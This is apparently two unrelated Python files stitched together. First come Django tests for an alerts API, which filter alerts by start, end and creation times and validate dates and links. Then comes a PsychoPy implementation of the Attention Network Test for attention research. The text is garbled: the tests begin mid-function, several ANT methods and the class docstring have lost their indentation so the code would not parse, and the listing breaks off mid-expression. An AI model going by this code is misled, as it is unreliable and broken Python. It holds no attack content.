            flavor=flavor,
            start_time=yesterday
        )
        alert2 = AlertFactory(
            summary=u'alert 2',
            flavor=flavor,
            start_time=daybeforeyesterday
        )

        # Helper: issue a GET with the given window and compare the
        # returned summaries against `expected` (order-insensitive).
        def test_scenario(start_time_start, start_time_end, expected):
            qs = {
                'flavors': flavor.slug,
            }
            if start_time_start:
                qs['start_time_start'] = start_time_start
            if start_time_end:
                qs['start_time_end'] = start_time_end
            resp = self.client.get(
                reverse('alerts-api') + '?' + urllib.urlencode(qs),
                HTTP_AUTHORIZATION='token ' + token.token
            )
            assert resp.status_code == 200
            data = json.loads(resp.content)
            assert (
                sorted([alert['summary'] for alert in data['alerts']]) ==
                sorted(expected)
            )

        # Start yesterday at 00:00
        test_scenario(
            start_time_start=yesterday.strftime('%Y-%m-%dT00:00'),
            start_time_end=None,
            expected=[alert1.summary]
        )
        # Start today at 00:00
        test_scenario(
            start_time_start=today.strftime('%Y-%m-%dT00:00'),
            start_time_end=None,
            expected=[]
        )
        # End today at 23:59
        test_scenario(
            start_time_start=None,
            start_time_end=today.strftime('%Y-%m-%dT23:59'),
            expected=[alert1.summary, alert2.summary]
        )
        # End day before yesterday at 00:00
        test_scenario(
            start_time_start=None,
            start_time_end=daybeforeyesterday.strftime('%Y-%m-%dT23:59'),
            expected=[alert2.summary]
        )
        # Start daybeforeyesterday at 00:00 and end today at 23:59
        test_scenario(
            start_time_start=daybeforeyesterday.strftime('%Y-%m-%dT00:00'),
            start_time_end=today.strftime('%Y-%m-%dT23:59'),
            expected=[alert1.summary, alert2.summary]
        )

    def test_start_time_invalid(self):
        """Malformed or inverted start_time windows yield a 400."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        qs = {
            'flavors': flavor.slug,
            'start_time_start': 'one',
            'start_time_end': 'one'
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        data = json.loads(resp.content)
        assert (
            data['detail']['start_time_start'][0]
            .startswith('Datetime has wrong format')
        )
        assert (
            data['detail']['start_time_end'][0]
            .startswith('Datetime has wrong format')
        )
        # Window end before window start is rejected.
        qs = {
            'flavors': flavor.slug,
            'start_time_start': datetime.datetime.now(),
            'start_time_end': (
                datetime.datetime.now() - datetime.timedelta(days=1)
            )
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        data = json.loads(resp.content)
        assert (
            data['detail'] ==
            {'non_field_errors': [
                u'start_time_start must occur before start_time_end.'
            ]}
        )

    def test_end_time(self):
        """end_time_start/end_time_end filter alerts by end_time."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        today = datetime.datetime.now()
        yesterday = today - datetime.timedelta(days=1)
        daybeforeyesterday = yesterday - datetime.timedelta(days=1)
        alert1 = AlertFactory(
            summary=u'alert 1',
            flavor=flavor,
            end_time=yesterday
        )
        alert2 = AlertFactory(
            summary=u'alert 2',
            flavor=flavor,
            end_time=daybeforeyesterday
        )

        # Helper: issue a GET with the given window and compare the
        # returned summaries against `expected` (order-insensitive).
        def test_scenario(end_time_start, end_time_end, expected):
            qs = {
                'flavors': flavor.slug,
            }
            if end_time_start:
                qs['end_time_start'] = end_time_start
            if end_time_end:
                qs['end_time_end'] = end_time_end
            resp = self.client.get(
                reverse('alerts-api') + '?' + urllib.urlencode(qs),
                HTTP_AUTHORIZATION='token ' + token.token
            )
            assert resp.status_code == 200
            data = json.loads(resp.content)
            assert (
                sorted([alert['summary'] for alert in data['alerts']]) ==
                sorted(expected)
            )

        # Start yesterday at 00:00
        test_scenario(
            end_time_start=yesterday.strftime('%Y-%m-%dT00:00'),
            end_time_end=None,
            expected=[alert1.summary]
        )
        # Start today at 00:00
        test_scenario(
            end_time_start=today.strftime('%Y-%m-%dT00:00'),
            end_time_end=None,
            expected=[]
        )
        # End today at 23:59
        test_scenario(
            end_time_start=None,
            end_time_end=today.strftime('%Y-%m-%dT23:59'),
            expected=[alert1.summary, alert2.summary]
        )
        # End day before yesterday at 00:00
        test_scenario(
            end_time_start=None,
            end_time_end=daybeforeyesterday.strftime('%Y-%m-%dT23:59'),
            expected=[alert2.summary]
        )
        # Start daybeforeyesterday at 00:00 and end today at 23:59
        test_scenario(
            end_time_start=daybeforeyesterday.strftime('%Y-%m-%dT00:00'),
            end_time_end=today.strftime('%Y-%m-%dT23:59'),
            expected=[alert1.summary, alert2.summary]
        )

    def test_end_time_invalid(self):
        """Malformed or inverted end_time windows yield a 400."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        qs = {
            'flavors': flavor.slug,
            'end_time_start': 'one',
            'end_time_end': 'one'
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        data = json.loads(resp.content)
        assert (
            data['detail']['end_time_start'][0]
            .startswith('Datetime has wrong format')
        )
        assert (
            data['detail']['end_time_end'][0]
            .startswith('Datetime has wrong format')
        )
        # Window end before window start is rejected.
        qs = {
            'flavors': flavor.slug,
            'end_time_start': datetime.datetime.now(),
            'end_time_end': (
                datetime.datetime.now() - datetime.timedelta(days=1)
            )
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        data = json.loads(resp.content)
        assert (
            data['detail'] ==
            {'non_field_errors': [
                u'end_time_start must occur before end_time_end.'
            ]}
        )

    def test_created(self):
        """created_start/created_end filter alerts by creation time."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        today = datetime.datetime.now()
        yesterday = today - datetime.timedelta(days=1)
        daybeforeyesterday = yesterday - datetime.timedelta(days=1)
        alert1 = AlertFactory(summary=u'alert 1', flavor=flavor)
        alert1.created = yesterday
        alert1.save()
        alert2 = AlertFactory(summary=u'alert 2', flavor=flavor)
        alert2.created = daybeforeyesterday
        alert2.save()

        # Helper: issue a GET with the given window and compare the
        # returned summaries against `expected` (order-insensitive).
        def test_scenario(created_start, created_end, expected):
            qs = {
                'flavors': flavor.slug,
            }
            if created_start:
                qs['created_start'] = created_start
            if created_end:
                qs['created_end'] = created_end
            resp = self.client.get(
                reverse('alerts-api') + '?' + urllib.urlencode(qs),
                HTTP_AUTHORIZATION='token ' + token.token
            )
            assert resp.status_code == 200
            data = json.loads(resp.content)
            assert (
                sorted([alert['summary'] for alert in data['alerts']]) ==
                sorted(expected)
            )

        # Start yesterday at 00:00 yields alert1.
        test_scenario(
            created_start=yesterday.strftime('%Y-%m-%dT00:00'),
            created_end=None,
            expected=[alert1.summary]
        )
        # Start today at 00:00 yields nothing.
        test_scenario(
            created_start=today.strftime('%Y-%m-%dT00:00'),
            created_end=None,
            expected=[]
        )
        # End today at 23:59 yields both.
        test_scenario(
            created_start=None,
            created_end=today.strftime('%Y-%m-%dT23:59'),
            expected=[alert1.summary, alert2.summary]
        )
        # End day before yesterday at 00:00 yields alert2.
        test_scenario(
            created_start=None,
            created_end=daybeforeyesterday.strftime('%Y-%m-%dT23:59'),
            expected=[alert2.summary]
        )
        # Start daybeforeyesterday at 00:00 and end today at 23:59 yields
        # both.
        test_scenario(
            created_start=daybeforeyesterday.strftime('%Y-%m-%dT00:00'),
            created_end=today.strftime('%Y-%m-%dT23:59'),
            expected=[alert1.summary, alert2.summary]
        )

    def test_created_invalid(self):
        """Malformed or inverted created windows yield a 400."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        qs = {
            'flavors': flavor.slug,
            'created_start': 'one',
            'created_end': 'one'
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        data = json.loads(resp.content)
        assert (
            data['detail']['created_start'][0]
            .startswith('Datetime has wrong format')
        )
        assert (
            data['detail']['created_end'][0]
            .startswith('Datetime has wrong format')
        )
        # Window end before window start is rejected.
        qs = {
            'flavors': flavor.slug,
            'created_start': datetime.datetime.now(),
            'created_end': (
                datetime.datetime.now() - datetime.timedelta(days=1)
            )
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        data = json.loads(resp.content)
        assert (
            data['detail'] ==
            {'non_field_errors': [
                u'created_start must occur before created_end.'
            ]}
        )

    def test_links(self):
        """Links attached to an alert appear in its serialized payload."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        alert = AlertFactory(summary=u'alert 1', flavor=flavor)
        link = LinkFactory(alert=alert)
        qs = {
            'flavors': flavor.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 200
        assert (
            json.loads(resp.content) ==
            {
                u'count': 1,
                u'total': 1,
                u'alerts': [
                    {
                        u'id': WHATEVER,
                        u'summary': u'alert 1',
                        u'description': u'the account balance is at $5.',
                        u'flavor': flavor.slug,
                        u'emitter_version': 0,
                        u'emitter_name': u'balance-checker',
                        u'start_time': None,
                        u'end_time': None,
                        u'created': WHATEVER,
                        u'severity': 0,
                        u'links': [
                            {u'name': link.name, u'url': link.url}
                        ]
                    }
                ]
            }
        )
class AlertsPostAPITest(TestCase):
    """POST on the alerts API: alert creation, datetime handling and
    link validation.
    """

    def test_post(self):
        """A valid POST creates an Alert and returns its id with a 201."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        data = {
            'severity': 5,
            'summary': 'test alert',
            'description': (
                'All we ever see of stars are their old photographs.'
            ),
            'flavor': flavor.slug,
            'emitter_name': 'testemitter',
            'emitter_version': 0
        }
        resp = self.client.post(
            reverse('alerts-api'),
            data=json.dumps(data),
            content_type='application/json',
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 201
        alert = Alert.objects.latest('id')
        assert json.loads(resp.content) == {'detail': {'id': alert.id}}
        assert alert.flavor.slug == flavor.slug
        assert alert.severity == data['severity']
        assert alert.summary == data['summary']
        assert alert.emitter_name == data['emitter_name']
        assert alert.emitter_version == data['emitter_version']

    @override_settings(TIME_ZONE='America/Los_Angeles')
    def test_post_with_dates(self):
        """UTC ('Z') datetimes are converted to the server timezone."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        data = {
            'severity': 5,
            'summary': 'test alert',
            'description': (
                'All we ever see of stars are their old photographs.'
            ),
            'flavor': flavor.slug,
            'emitter_name': 'testemitter',
            'emitter_version': 0,
            'start_time': '2015-03-02T16:22:00Z',
            'end_time': '2015-03-02T17:23:00Z'
        }
        resp = self.client.post(
            reverse('alerts-api'),
            data=json.dumps(data),
            content_type='application/json',
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 201
        alert = Alert.objects.latest('id')
        assert json.loads(resp.content) == {'detail': {'id': alert.id}}
        # 16:22 UTC is 08:22 in America/Los_Angeles (UTC-8).
        assert alert.start_time == datetime.datetime(2015, 3, 2, 8, 22, 0)
        assert alert.end_time == datetime.datetime(2015, 3, 2, 9, 23, 0)

    def test_post_invalid_start_time(self):
        """A malformed start_time yields a 400 with a format error."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        data = {
            'severity': 5,
            'summary': 'test alert',
            'description': (
                'All we ever see of stars are their old photographs.'
            ),
            'flavor': flavor.slug,
            'emitter_name': 'testemitter',
            'emitter_version': 0,
            'start_time': '2015'
        }
        resp = self.client.post(
            reverse('alerts-api'),
            data=json.dumps(data),
            content_type='application/json',
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        content = json.loads(resp.content)
        assert (
            content['detail']['start_time'][0]
            .startswith(u'Datetime has wrong format.')
        )

    @override_settings(TIME_ZONE='America/Los_Angeles')
    def test_post_start_time_timezone_change(self):
        """Datetimes with an explicit offset are converted correctly."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        data = {
            'severity': 5,
            'summary': 'test alert',
            'description': (
                'All we ever see of stars are their old photographs.'
            ),
            'flavor': flavor.slug,
            'emitter_name': 'testemitter',
            'emitter_version': 0,
            'start_time': '2015-03-02T16:22:00-0600',
            'end_time': '2015-03-02T17:23:00-0600'
        }
        resp = self.client.post(
            reverse('alerts-api'),
            data=json.dumps(data),
            content_type='application/json',
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 201
        alert = Alert.objects.latest('id')
        assert json.loads(resp.content) == {'detail': {'id': alert.id}}
        # 16:22 at UTC-6 is 14:22 in America/Los_Angeles (UTC-8).
        assert alert.start_time == datetime.datetime(2015, 3, 2, 14, 22, 0)
        assert alert.end_time == datetime.datetime(2015, 3, 2, 15, 23, 0)

    @override_settings(TIME_ZONE='America/Los_Angeles')
    def test_post_date_roundtrip(self):
        """Test we can POST a date and then GET the same date back"""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        start_time = '2015-03-02T16:22:00Z'
        data = {
            'severity': 5,
            'summary': 'test alert',
            'description': (
                'One if by land.'
            ),
            'flavor': flavor.slug,
            'emitter_name': 'testemitter',
            'emitter_version': 0,
            'start_time': start_time
        }
        resp = self.client.post(
            reverse('alerts-api'),
            data=json.dumps(data),
            content_type='application/json',
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 201
        alert = Alert.objects.latest('id')
        assert json.loads(resp.content) == {'detail': {'id': alert.id}}
        # Stored in local server time (UTC-8)...
        assert alert.start_time == datetime.datetime(2015, 3, 2, 8, 22, 0)
        # ...but serialized back as the original UTC string on GET.
        qs = {
            'flavors': flavor.slug
        }
        resp = self.client.get(
            reverse('alerts-api') + '?' + urllib.urlencode(qs),
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 200
        assert (
            json.loads(resp.content) ==
            {
                u'count': 1,
                u'total': 1,
                u'alerts': [
                    {
                        u'id': WHATEVER,
                        u'summary': u'test alert',
                        u'description': u'One if by land.',
                        u'flavor': flavor.slug,
                        u'emitter_version': 0,
                        u'emitter_name': u'testemitter',
                        u'start_time': start_time,
                        u'end_time': None,
                        u'created': WHATEVER,
                        u'severity': 5,
                        u'links': [],
                    }
                ]
            }
        )

    def test_post_with_link(self):
        """Links supplied with the POST are created alongside the alert."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        data = {
            'severity': 5,
            'summary': 'test alert',
            'description': (
                'All we ever see of stars are their old photographs.'
            ),
            'flavor': flavor.slug,
            'emitter_name': 'testemitter',
            'emitter_version': 0,
            'links': [{'name': 'link', 'url': 'http://example.com/'}]
        }
        resp = self.client.post(
            reverse('alerts-api'),
            data=json.dumps(data),
            content_type='application/json',
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 201
        alert = Alert.objects.latest('id')
        assert json.loads(resp.content) == {'detail': {'id': alert.id}}
        links = Link.objects.filter(alert=alert)
        assert len(links) == 1
        assert links[0].name == 'link'
        assert links[0].url == 'http://example.com/'

    def test_invalid_links(self):
        """Links missing a name or url yield a 400 and create no alert."""
        token = TokenFactory()
        flavor = AlertFlavorFactory(name='Foo', slug='fooflavor')
        flavor.allowed_tokens.add(token)
        # Missing link name
        data = {
            'severity': 5,
            'summary': str(uuid4()),
            'description': (
                'All we ever see of stars are their old photographs.'
            ),
            'flavor': flavor.slug,
            'emitter_name': 'testemitter',
            'emitter_version': 0,
            'links': [{'url': 'http://example.com/'}]
        }
        resp = self.client.post(
            reverse('alerts-api'),
            data=json.dumps(data),
            content_type='application/json',
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        assert (
            json.loads(resp.content) ==
            {
                u'detail': {
                    u'links': [
                        u'Missing names or urls in link data. '
                        u"{u'url': u'http://example.com/'}"
                    ]
                }
            }
        )
        assert Alert.objects.filter(summary=data['summary']).count() == 0
        # Missing link url
        data = {
            'severity': 5,
            'summary': str(uuid4()),
            'description': (
                'All we ever see of stars are their old photographs.'
            ),
            'flavor': flavor.slug,
            'emitter_name': 'testemitter',
            'emitter_version': 0,
            'links': [{'name': 'link'}]
        }
        resp = self.client.post(
            reverse('alerts-api'),
            data=json.dumps(data),
            content_type='application/json',
            HTTP_AUTHORIZATION='token ' + token.token
        )
        assert resp.status_code == 400
        assert (
            json.loads(resp.content) ==
            {
                u'detail': {
                    u'links': [
                        u'Missing names or urls in link data. '
                        u"{u'name': u'link'}"
                    ]
                }
            }
        )
        assert Alert.objects.filter(summary=data['summary']).count() == 0
|
|
"""
ANT (Attention Network Test) implemented in PsychoPy2
Created by Per Baekgaard / pgba@dtu.dk / baekgaard@b4net.dk, September 2015
Licensed under the MIT License:
Copyright (c) 2015,2016 Per Baekgaard, Technical University of Denmark, DTU Informatics, Cognitive Systems Section
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without
limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the
Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE
OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
# Standard module metadata dunders.
__author__ = "Per Baekgaard"
__copyright__ = \
    "Copyright (c) 2015, Per Baekgaard, Technical University of Denmark, DTU Informatics, Cognitive Systems Section"
__license__ = "MIT"
__version__ = "1.0"
__email__ = "pgba@dtu.dk"
__status__ = "Beta"
import sys
from psychopy import visual, core, event, monitors, tools
import pyglet
import time
import numpy as np
import random as random
class Bunch(object):
    """Lightweight attribute container: Bunch(a=1).a == 1."""
    def __init__(self, **attributes):
        # Expose every keyword argument as an instance attribute.
        for key, value in attributes.items():
            setattr(self, key, value)
# Experimental setup
class ANTExp:
"""This class implements the ANT (Attention Network Test) in PsychoPy2
To use this class, do something like the following:
# Create the ANT Experimental class
exp = ANTExp(mon, win, winsize, refresh, globalClock, startTime, alog)
# Show the instructions to the user
noPractice = exp.displayInstructions()
# Run the practice block
exp.practiceBlock()
# Run the real experiment as 3*2 runs
for r in range(6):
if r%2 == 0:
if exp.displayText("Starting experimental block %d of 3\nHit any key when ready to start." % (r/2+1), showLine=False):
break
core.wait(1)
block = exp.fullExperiment()
if block == None:
break
if allData == None:
allData = block
else:
allData = np.concatenate((allData, block))
# do something with allData
For a full description of the original experiment, see:
Jin Fan, Bruce D. McCandliss, Tobias Sommer, Amir Raz, and Michael I. Posner:
"Testing the Efficiency and Independence of Attentional Networks"
Journal of Cognitive Neuroscience 14:3, pp. 340-347 (2002)
"""
    def _fixStim(self):
        """Returns a fixation cross '+' (as a visual) to be drawn later"""
        # Half-extent of the cross arms, in degrees.
        a = self.cueSize/2.
        # Trace the vertical bar, return to centre, then the horizontal
        # bar, so one ShapeStim path draws the whole '+'.
        vertices = [[0,0], [0,a], [0,-a], [0,0], [-a,0], [a,0], [0,0]]
        return visual.ShapeStim(self.win, fillColor=None, lineColor='black',
            lineWidth=self.allWidthPix, units='deg', vertices=vertices)
def _cueStim(self):
"""Returns a cue '*' (as a visual) to be drawn later"""
a = self.cueSize/2.
w = self.cueSize/20.
c1 = a*0.9511
s1 = a*0.3090
c2 = a*0.5878
s2 = a*0.8090
vertices = [[0,0], [0,a], [0,0], [c1, s1], [0,0], [c2, -s2], [0,0], [-c2, -s2], [0,0], [-c1, s1], [0,0]]
return visual.ShapeStim(self.win, fillColor=None, lineColor='black',
lineWidth=self.allWidthPix, units='deg', vertices=vertices)
def _drawLine(self, pos, sz, pw, short, tdir):
"""Return a tdir (left or right) line of width pw at pos of given sz,
making it possibly short (to make room for arrow heads)
"""
a = sz/2.
if short and tdir=='left':
vertices = [[a, pw], [-a/3.0, pw], [-a/3.0, -pw], [a, -pw]]
elif short and tdir=='right':
vertices = [[-a, pw], [a/3.0, pw], [a/3.0, -pw], [-a, -pw]]
else:
vertices = [[-a, pw], [a, pw], [a, -pw], [-a, -pw]]
return visual.ShapeStim(self.win, pos=pos, lineColor=None, fillColor='black', units='deg', vertices=vertices)
def _drawHead(self, pos, sz, pw, tdir):
"""Return an arrowhead (left or right, depending on tdir) fitting with a short line"""
a = sz/2.
if tdir=='left':
vertices = [[-a/3.0, a/3.0], [-a, 0], [-a/3.0, -a/3.0]]
elif tdir=='right':
vertices = [[a/3.0, a/3.0], [a, 0], [a/3.0, -a/3.0]]
return visual.ShapeStim(self.win, pos=pos, lineColor=None, fillColor='black', units='deg', vertices=vertices)
    def _targetStim(self, tloc, tdir, flank):
        """Return a complete buffer of specified target at position tloc (top or down)
        with flankers (congruent, neutral, or incongruent) in direction tdir (left or right)
        ready to flip
        """
        sz = self.arrowSize
        pw = self.allWidthDeg
        # center-to-center spacing between neighbouring arrows
        p = self.arrowSize + self.arrowSep
        y = self.targetDist if tloc=='top' else -self.targetDist
        if self.runDummy:
            # dummy mode: five plain bars with no arrowheads (nothing to respond to)
            lines = [ self._drawLine((x, y), sz, pw, False, None) for x in (-2*p, -p, 0, p, 2*p) ]
            heads = []
        elif flank=='neutral':
            # four plain flanker bars plus a short center bar carrying the only head
            lines = [ self._drawLine((x, y), sz, pw, False, None) for x in (-2*p, -p, p, 2*p) ]
            lines = lines + [self._drawLine((0, y), sz, pw, True, tdir)]
            heads = [ self._drawHead((0, y), sz, pw, tdir) ]
        elif flank=='congruent':
            # all five arrows point the same way as the target
            lines = [ self._drawLine((x, y), sz, pw, True, tdir) for x in (-2*p, -p, 0, p, 2*p) ]
            heads = [ self._drawHead((x, y), sz, pw, tdir) for x in (-2*p, -p, 0, p, 2*p) ]
        elif flank=='incongruent':
            # four flankers point opposite to the center target arrow
            rdir = 'left' if tdir=='right' else 'right'
            lines = [ self._drawLine((x, y), sz, pw, True, rdir) for x in (-2*p, -p, p, 2*p) ]
            heads = [ self._drawHead((x, y), sz, pw, rdir) for x in (-2*p, -p, p, 2*p) ]
            lines = lines + [ self._drawLine((0, y), sz, pw, True, tdir) ]
            heads = heads + [ self._drawHead((0, y), sz, pw, tdir) ]
        # NOTE(review): an unknown `flank` (when not runDummy) leaves lines/heads
        # unbound and raises NameError below; callers only pass the three known values.
        # Pre-render everything into one off-screen buffer so a single flip shows it.
        return visual.BufferImageStim(self.win, stim=(lines + heads))
    def __init__(self, mon, win, winsize, refreshRate, clock, startTime, logfile=None, runDummy=False, original=True):
        """Create an ANTExp class at the specified monitor/window of given size and refreshrate
        mon -- the (PsychoPy) monitor spec; needed to determine correct scale
        win -- the (PsychoPy) window visual on which you will run the experiment (should be full screen)
        winsize -- (width, height) of the monitor in pixels
        refreshRate -- the monitor refresh rate in frames pr second; needed to calculate proper frame timing
        clock -- the (PsychoPy) clock which you use for measuring time within this experiment
        startTime -- the walltime (epoch; seconds since Jan 1st 1970 00:00) that corresponds to clock==0.0
        logfile -- an open file that is used for printing results to (if not given, then stdout is used)
        runDummy -- removes arrowheads; can be used when no response is solicited from the user
        original -- can be set to False to remove fixation crosses after the user has replied
        """
        self.mon = mon
        self.win = win
        self.winsize = winsize
        self.refreshRate = refreshRate
        # duration of one frame in seconds; used when scheduling flips
        self.frameTime = 1.0 / refreshRate
        self.clock = clock
        self.startTime = startTime
        self.logfile = logfile
        self.runDummy = runDummy
        self.original = original
        # Emit the semicolon-separated header matching the per-trial log lines
        if logfile:
            logfile.write("wallt;t0;warning;position;direction;congruency;d1;ct;d2;rt;tf;response\n")
        else:
            print("wallt;t0;warning;position;direction;congruency;d1;ct;d2;rt;tf;response")
        ### BEGIN Semi-configurable values
        # Timings for each 'procedure' (all in milliseconds)
        self.tD1min = 400 # Min initial fixation time
        self.tD1max = 1600 # Max initial fixation time
        self.tCue = 100 # Cue time
        self.tNoCue = 400 # Time after cue before target
        self.tOut = 1700 # Target timeout
        self.tDummy = 700 # Time to show target when running dummy
        self.tExp = 4000 # Total procedure time
        # Visual setup
        self.arrowSize = 0.55 # Size of an arrow (visual angle)
        self.arrowSep = 0.06 # Separation between arrows (visual angle)
        self.cueSize = 0.35 # Size of the fixation and the cue (size from opensesame implementation)
        self.allWidthDeg = 0.04 # Linewidth of stimuli (visual angle)
        self.allWidthPix = tools.monitorunittools.deg2pix(self.allWidthDeg, mon) # Linewidth of stimuli (in pixels!)
        self.targetDist = 1.06 # Vertical distance from fixation center to target center
        ### END (Semi-)configurable options
        # Set up the experimental combinations, creating a list of all combinations of cue, location, direction and flankers
        # (note: [Bunch()] * 48 repeats one shared Bunch, but every slot is reassigned below, so this is harmless)
        self.procedures = [Bunch()] * 48
        i = 0
        for cue in ('no', 'spatial', 'center', 'double'):
            for tloc in ('top', 'bottom'):
                for tdir in ('left', 'right'):
                    for flank in ('incongruent', 'neutral', 'congruent'):
                        self.procedures[i] = Bunch(cue=cue, tloc=tloc, tdir=tdir, flank=flank)
                        i += 1
        # Create visual stimuli to be used (fixation cross and cues and all targets)
        self.visFix = self._fixStim()
        self.visCue = self._cueStim()
        self.visTarget ={}
        for tloc in ('top', 'bottom'):
            for tdir in ('left', 'right'):
                for flank in ('incongruent', 'neutral', 'congruent'):
                    self.visTarget[tloc+tdir+flank] = self._targetStim(tloc, tdir, flank)
    def _oneProcedure(self, condition, short=False):
        """Presents one complete 'procedure' of (initial fixation, cue, wait, target and response and final delay)
        Returns the timing for said procedure, using the clock set up initially or None if the user halted!
        Expects to be called with "some time" before next flip, and returns immediately after the final flip
        so it can be called repeatedly with no delays, and will then run the experiment at the expected timing
        Overall procedure is like this -- for each stimuli to be show:
            Draw stimuli to backbuffer
            Wait until previous stimuli is done
            Flip window and wait until retrace
            (Repeat for next stimuli)
        condition -- the condition requested (cue, tloc, pos)
        short -- can be used to shorten the waiting time after the user has replied;
            this can be helpful in the practice rounds (but was likely not present in the original experiment).
        """
        def waitAndFlip(t):
            """Wait until next flip after time t (offset to self.clock) has passed, then flip (once only!)
            Returns time of flip (also offset to self.clock)
            """
            # Sleep until one frame before the deadline, polling at half-frame resolution
            core.wait(t - self.clock.getTime() - self.frameTime, self.frameTime/2.0)
            self.win.flip()
            return self.clock.getTime()
        quit = False  # NOTE(review): shadows the `quit` builtin; harmless here, rename if touched
        # Draw initial fixation cross and get start-time from the global clock (no previous stimuli)
        self.visFix.draw()
        self.win.flip()
        t0 = self.clock.getTime()
        # Pull a random waiting time (milliseconds, 10 ms steps)
        r = random.randrange(self.tD1min, self.tD1max, 10)
        # Draw cue (if any)
        if condition.cue != 'no':
            if condition.cue == 'double' or (condition.cue == 'spatial' and condition.tloc == 'top'):
                if self.original:
                    self.visFix.draw()
                self.visCue.pos = (0, self.targetDist)
                self.visCue.draw()
            if condition.cue == 'double' or (condition.cue == 'spatial' and condition.tloc == 'bottom'):
                if self.original:
                    self.visFix.draw()
                self.visCue.pos = (0, -self.targetDist)
                self.visCue.draw()
            if condition.cue == 'center':
                self.visCue.pos = (0, 0)
                self.visCue.draw()
        else:
            self.visFix.draw()
        # Wait random time and Present cue when ready
        d1 = waitAndFlip(t0 + r/1000.0) - t0
        # Draw fixation cross again
        self.visFix.draw()
        # Wait for cue time and present fixation cross again when ready
        # (0.1 s hard-codes self.tCue/1000.0 -- keep in sync with tCue)
        ct = waitAndFlip(t0 + d1 + 0.1) - t0 - d1
        # Draw target
        self.visTarget[condition.tloc+condition.tdir+condition.flank].draw()
        if self.original:
            self.visFix.draw()
        # Wait for 2nd fixation time and Present target when ready
        # (0.4 s hard-codes self.tNoCue/1000.0 -- keep in sync with tNoCue)
        d2 = waitAndFlip(t0 + d1 + 0.1 + 0.4) - t0 - d1 - ct
        # Discard any buffered events (we don't accept extremely fast reaction times here!)
        event.clearEvents(eventType='keyboard')
        # Wait for user response or timeout
        if self.runDummy:
            keys = event.waitKeys(maxWait = self.tDummy/1000.0-self.frameTime, timeStamped=self.clock)
        else:
            keys = event.waitKeys(maxWait = self.tOut/1000.0-self.frameTime, timeStamped=self.clock)
        if keys is not None:
            print("Got %s at %s expecting %s" % (keys[0][0], keys[0][1], condition.tdir))
            if keys[0][0] == 'escape':
                quit = True
                resp = 'QUIT'
            elif keys[0][0] == '0':
                # NOTE(review): '0' pauses for 100 s but leaves `resp` unbound, so the
                # Bunch(...) below raises NameError -- confirm the intended behaviour
                core.wait(100)
            elif ((keys[0][0] == ('%s' % condition.tdir)) or
                (keys[0][0] in ['f', 'a', 'z', 'q'] and condition.tdir=='left') or
